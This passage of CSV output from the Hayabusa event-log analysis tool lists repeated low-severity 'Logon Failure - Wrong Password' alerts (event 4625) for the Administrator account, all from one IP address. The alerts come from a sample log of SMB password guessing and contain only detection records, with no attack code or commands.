Wrong Password,User: Administrator | Type: 3 | Computer: mmiHIQrpsAVRJtdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.241 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4TdkChjMAviJ6jr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.283 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPIGU1rBk0F5cG9P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.329 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ScynGWKK3CtoUsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.373 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0E4JAuxC8MuuGfnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.420 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4aDJtqsUWKyuDqBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.469 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCFrEHUgqCtKPybS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.508 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ftrEBfaLGbboV8D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: thle3slH6gZYllyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.592 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PcEnabS7oj98WI0e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EBqGp9CD4A9PsyLk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iil8dQlzMCkKRNUb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:22.735 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nDBqxF9bmNNjNdsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.795 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJNBRV3BRVEN8hmG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.837 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OGl1Tbdw7PDvVsRR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uspHTc4JwnjjZQti | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.930 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Exq3nfy1LeFOPcA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vdFC4g7vsLO0zOzL | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.019 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HpdCohLheoqQ6DXw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.062 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHS3sclMwgHuH8rE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.100 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sNSheImuQwgOEH5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.142 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GX5y374mlYYXbAB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaFRL6q9KQY5bFHZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.230 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrkEyJmfLiSrvQGs | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.261 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fd1vJiJa3pdjqdQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RVrZl3LOIa7VLhT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TKR8KbyQkwRX1qTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GY22XuDxbE5lvEra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.441 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4AntiX3j9HLHcOOq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.501 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
XIvMbod41WeNADy5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.538 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0UL4lb3CCrv7YfGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OyRktDjPqFyrdSTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.632 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKEGmAH8Wbc7f3jC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.676 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06Dfi4lO2Vdw3gCr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29eXmenUTACkAHKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: 2Zq7Gl6hnKDJJqFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.809 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jKENlWYt6m78taZR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.863 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 822SUU2Hg6w6AqQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.911 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bROU0Mk9Z4yEq323 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:23.952 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKfVPleDpLLqkuKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.047 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NGWVqbchMitnLVYT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.086 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: y7K9vifU9lWwpP9J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.142 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIgKYj210JfICJXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jisuKilPQivTV8yE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.229 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hckyoom0XnqpRzK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.284 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: De0l6qgcuhMERjMY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.343 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SSa7pylPWn8jl2Ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.377 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: ol9OntO4hqidlNUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.431 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kXOBF0ZWLxMauHuT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.504 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVBFJltkR5vnmpYD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.554 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kHVXEHq9zNYdfTpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OIw3BxmLsfwDXXFg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.647 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hhgRhjnhkRJus4fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.696 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xz78guWXrekEvuFT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.742 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 04wNT26RJmriQrfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.792 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XmbuuymdSpfNldt2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.837 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yqJarBVOImq5Tn2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.876 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BZYExQroYH65tPuG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.913 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llU5DQBrIrV3VtG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:24.953 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HV17iXOYQqs2ntax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:24.994 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esZnEeyGdPa22PsL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rlYFTP9a2wdi5A2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.075 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJifU0PnO1Ntp6z3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.120 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGKdKjJy28Qd1whT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.166 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3L4BYjYJYlvuYHE | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.206 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ui5RoLKttDo0wfFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G2xjdWobsxBjo6p7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.293 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TPeQ0M5lXITI84G3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.337 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uu72qx4lG5ZRM7xf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.392 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zD072YR1hIgbzjaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.449 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqA7HDvImIlCiFq2 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.508 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: efYFxZwMGEC3vVi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.552 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6WmMHYegvFJvv6zd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.601 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DS9WkRnP0B5MgaeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.656 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5jNPV7ZgFExgg9n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.707 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1FJ6vm3wK97iual | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.753 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
